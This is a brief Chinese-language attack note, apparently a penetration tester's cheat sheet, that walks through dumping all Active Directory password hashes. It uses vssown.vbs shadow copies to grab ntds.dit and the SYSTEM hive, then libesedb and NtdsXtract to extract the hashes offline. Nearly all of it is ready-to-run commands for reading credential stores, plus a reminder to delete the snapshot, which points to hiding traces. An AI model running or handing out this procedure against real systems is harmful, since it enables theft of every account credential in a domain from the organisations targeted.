vssown.vbs + libesedb + NtdsXtract

上面的QuarkPwDump是在win上面分析ntds.dit,这个是linux上面的离线分析 优点是能获取全部的用户,不用免杀,但是数据特别大,效率低,另外用vssown.vbs复制出来的ntds.dit数据库无法使用QuarksPwDump.exe读取

hash导出: https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs

最后需要copy出system和ntds.dit两个文件

  1. c:\windows\system32\config\system
  2. c:\windows\ntds\ntds.dit

vssown.vbs + libesedb + NtdsXtract - 图1 vssown.vbs + libesedb + NtdsXtract - 图2 记得一定要delete快照!!!

  1. cscript vssown.vbs /delete *

本地环境搭建+分析:

  1. libesedb的搭建:
  2. wget https://github.com/libyal/libesedb/releases/download/20151213/libesedb-experimental-20151213.tar.gz
  3. tar zxvf libesedb-experimental-20151213.tar.gz
  4. cd libesedb-20151213/
  5. ./configure
  6. make
  7. cd esedbtools/
  8. (需要把刚刚vbs脱下来的ntds.dit放到kali)
  9. ./esedbexport ./ntds.dit
  10. mv ntds.dit.export/ ../../
  12. ntdsxtract工具的安装:
  13. wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
  14. unzip ntdsxtract_v1_0.zip
  15. cd NTDSXtract 1.0/
  16. (需要把刚刚vbs脱下来的SYSTEM放到/root/SYSTEM)
  17. python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes '/root/SYSTEM'

vssown.vbs + libesedb + NtdsXtract - 图3